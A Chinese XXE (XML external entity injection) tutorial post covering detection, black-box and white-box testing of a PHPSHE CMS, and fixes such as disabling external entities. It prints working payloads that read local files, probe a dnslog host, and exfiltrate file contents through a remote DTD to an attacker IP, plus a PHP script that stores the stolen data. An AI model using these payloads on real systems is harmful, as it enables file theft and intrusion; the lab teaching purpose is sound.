当前位置：首页 > news >正文

059-Web攻防-XXE安全DTD实体复现源码等

news 2025/12/29 21:17:46

059-Web攻防-XXE安全&DTD实体&复现源码等

知识点

XML&XXE-传输-原理&探针&利用&玩法

XML&XXE-黑盒-JS&黑盒测试&类型修改

XML&XXE-白盒-CMS&PHPSHE&无回显

什么是XML?

XML 被设计为传输和存储数据，XML 文档结构包括 XML 声明、DTD 文档类型定义（可

选）、文档元素，其焦点是数据的内容，其把数据从 HTML 分离，是独立于软件和硬件的

信息传输工具。等同于 JSON 传输。

XXE 漏洞 XML External Entity Injection

即 xml 外部实体注入漏洞，XXE 漏洞发生在应用程序解析 XML 输入时，没禁止外部实体

的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网扫描、攻击内网等危

害。

XML 与 HTML 的主要差异：

XML 被设计为传输和存储数据，其焦点是数据的内容。

HTML 被设计用来显示数据，其焦点是数据的外观。

HTML 旨在显示信息，而 XML 旨在传输存储信息。

Example：网站的 xml 文件解析

第一种为xml格式传输

第二钟常规传输

第三种为json传输

-XXE 黑盒发现漏洞：

1、获取得到 Content-Type 或数据类型为 xml 时，尝试 xml 语言 payload 进行测试

2、不管获取的 Content-Type 类型或数据传输类型，均可尝试修改后提交测试 xxe

3、XXE 不仅在数据传输上可能存在漏洞，同样在文件上传引用插件解析或预览也会造成

文件中的 XXE Payload 被执行

4、流量包里面对关键字进行筛选<?xml

-XXE 白盒发现：

1、可通过应用功能追踪代码定位审计

2、可通过脚本特定函数搜索定位审计

3、可通过伪协议玩法绕过相关修复等

XXE 修复防御方案：

-方案 1-禁用外部实体

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf

=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferenc

es(false);

Python：

from lxml import etreexmlData =

etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

—方案2-过滤用户提交的XML数据

过滤关键字：<!DOCTYPE 和<!ENTITY,或者 SYSTEM 和 PUBLIC

XML&XXE-传输-原理&探针&利用&玩法

参考：https://www.cnblogs.com/20175211lyz/p/11413335.html

1、读取文件：有回显

1、读取文件：
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM  "file:///d:/1.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>

简单案例

在本地搭建的xxe网站登录进行抓包
修改请求复制粘贴上面的代码读取我D盘下事先准备好的文件1.txt
读取成功

1.1、带外测试：无回显

<?xml version="1.0" ?>
<!DOCTYPE test [<!ENTITY % file SYSTEM "http://y80f9n.dnslog.cn">%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>

简单案例

修改代码将上面的代码复制粘贴到请求包里面

2、外部引用实体dtd：无回显

<?xml version="1.0" ?>
<!DOCTYPE test [<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>evil2.dtd：
<!ENTITY send SYSTEM "file:///d:/e.txt">

简单案例

在本地目录下面写好我们的text.txt将后缀修改为dtd文件内容如下
将此文件放在www文件夹下面
打开登录界面进行抓包

问题：test.dtd为什么读取的是我本机上面的d盘下的1.txt而不是我虚拟机上面的

XXE 中的 file:// 是一个本地文件 URI 协议，表示访问当前操作系统本地的文件系统。

所以：文件路径是相对于“XML 解析器”运行所在的系统，而不是相对于 DTD 所在的服务器。

让 XML 在虚拟机中被解析：让你的服务程序（比如 DVWA、Java Web 服务、PHP）在虚拟机里运行，那 XXE 攻击读取的就是虚拟机里的文件。
将虚拟机中的文件通过 HTTP 暴露出来<!ENTITY send SYSTEM "http://<虚拟机IP>:8081/1.txt">

3、无回显读文件

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/2.txt"> 
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>解释：
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/2.txt"> //定义一个外部实体 file，它的内容是本地 D 盘上的 2.txt 文件内容
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
//再定义一个实体 remote，告诉解析器去远程加载 test.dtd 文件。
%remote;//加载并执行 test.dtd 中的内容（这是关键，像 include 一样）
%all;//加载 test.dtd 中定义的 %all 实体（下一步会看到它的作用）。
]>
<root>&send;</root>//最终输出实体 send 的内容，它是在远程的 test.dtd 中间接定义的test.dtd：
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">
//这里定义了一个实体 %all，它的内容是再定义一个名叫 send 的实体。
这个 send 的值是一个远程 URL，它包含 %file;，也就是之前读取到的 d:/2.txt 文件内容
最终，&send; 会被替换为对这个 URL 的请求（比如 get.php?file=secret123），从而把敏感文件内容发送到攻击者服务器上。get.php<?php 
$data=$_GET['file'];
$myfile=fopen("file.txt","+w");
fwrite($myfile,$data);
fclose($myfile);
?>//这个脚本的作用是保存 XML 请求中泄露出来的文件内容[目标机器解析 XML]↓
读取 file:///d:/2.txt 成为实体 file↓
从 http://47.94.236.117/test.dtd 加载恶意 DTD↓
test.dtd 定义 send → 包含敏感文件内容的 URL↓
XML 中出现 &send; → 向攻击者网站发出请求↓
get.php 接收数据并保存为 file.txt

简单案例

本地目录下面创建2.txt内容如下文件里面的内容不能是中文 XML 解析器要求 URI 必须是符合标准格式的 ASCII 字符串
在虚拟机本地目录下面写入文件test1.txt写完修改后缀为dtd并在目录下面写入get.php文件
在登录页面访问抓包将上面的代码复制到请求包里面

黑盒测试：观察数据的格式

白盒测试：处理数据的函数和框架

4、其他玩法（协议）-见参考地址

参考：https://www.cnblogs.com/20175211lyz/p/11413335.html

当无回显时我们应该想到三个问题：

1. 无漏洞
2. 无回显
3. payload有问题

XML&XXE-黑盒-JS&黑盒测试&类型修改

http://web.jarvisoj.com:9882/XXE 黑盒发现:
1、获取 Content-Type 或数据类型为 xml 时，尝试进行 xml 语言 payload 进行测试

2、不管获取的 Content-Type 类型或数据传输类型，均可尝试修改后提交测试 xxe流程:功能分析-前端提交-源码&抓包-构造 Paylod 测试更改请求数据格式:Content-Type

<?xml version="1.0" ?>
<!DOCTYPE ANY [<!ENTITY f SYSTEM "file:///d:/1.txt">
]>
<x>&f;
</x>

ML&XXE-白盒-CMS&PHPSHE&无回显

审计流程简单案例：

漏洞函数simplexml_load_string用来把 XML 字符串转换成一个可以操作的对象（类似数组）**，方便你读取或处理 XML 数据
pe_getxml函数调用了漏洞函数右键转到申明和用力查看调用的地方
wechat_getxml调用了pe_getxml
notify_url 调用了wechat_getxml
访问Notify_url文件抓包出发wechat_getxml函数，构造payload测试 无回显使用带外

先尝试读取文件，无回显后带外测试

<?xml version="1.0" ?>
<!DOCTYPE ANY [<!ENTITY f SYSTEM "file:///d:/1.txt">
]>
<x>&f;
</x>

查看全文

http://www.hskmm.com/?act=detail&tid=9833

061-WEB攻防-PHP反序列化原生类TIPSCVE绕过漏洞属性类型特征

051-Web攻防-文件安全目录安全测试源码等

Dilworth定理及其在算法题中的应用

050-WEB攻防-PHP应用文件包含LFIRFI伪协议编码算法无文件利用黑白盒

error: xxxxx does not have a commit checked out

049-WEB攻防-文件上传存储安全OSS对象分站解析安全解码还原目录执行

云原生周刊：MetalBear 融资、Chaos Mesh 漏洞、Dapr 1.16 与 AI 平台新趋势

AI一周资讯 250913-250919

045-WEB攻防-PHP应用SQL二次注入堆叠执行DNS带外功能点黑白盒条件-cnblog

linux 命令语句

用 Kotlin 实现英文数字验证码识别

达芬奇（DaVinci Reslove）字体文件 bugb标签

语音芯片怎样挑选？语音芯片关键选型要点？

KingbaseES Schema权限及空间限额

HTTP库开发实战：核心库与httpplus扩展库示例解析

QMT交易系统向服务器同步订单丢失问题排查

笔记1

用 Python 和 Tesseract 实现英文数字验证码识别

实用指南：OSPF特殊区域、路由汇总及其他特性

禅道以及bug

中电金信：MCP在智能体应用中的挑战与对策

第一次参与开源的时序数据库 IoTDB Committer：这份成就感是无可替代的

ECT-OS-JiuHuaShan 框架元推理的意义、价值、作用、应用场景和哲学理念的充分阐述：AGI奇点

CSP 2025 复赛复习总目标与计划

mysql区分大小写吗，你可能忽略了这些关键细节

route-link 和 a 的区别

WPF 调用 Windows 桌面右键新增文件菜单的实现方案

HR 需了解的绩效评估应包含的内容

解题报告-P12022 [USACO25OPEN] Hoof Paper Scissors Minus One B

CentOS架构修改网卡命名的方法总结

059-Web攻防-XXE安全&DTD实体&复现源码等

-XXE 黑盒发现漏洞：

XML&XXE-传输-原理&探针&利用&玩法

1、读取文件：有回显

1.1、带外测试：无回显

2、外部引用实体dtd：无回显

3、无回显读文件

XML&XXE-黑盒-JS&黑盒测试&类型修改

ML&XXE-白盒-CMS&PHPSHE&无回显

相关文章：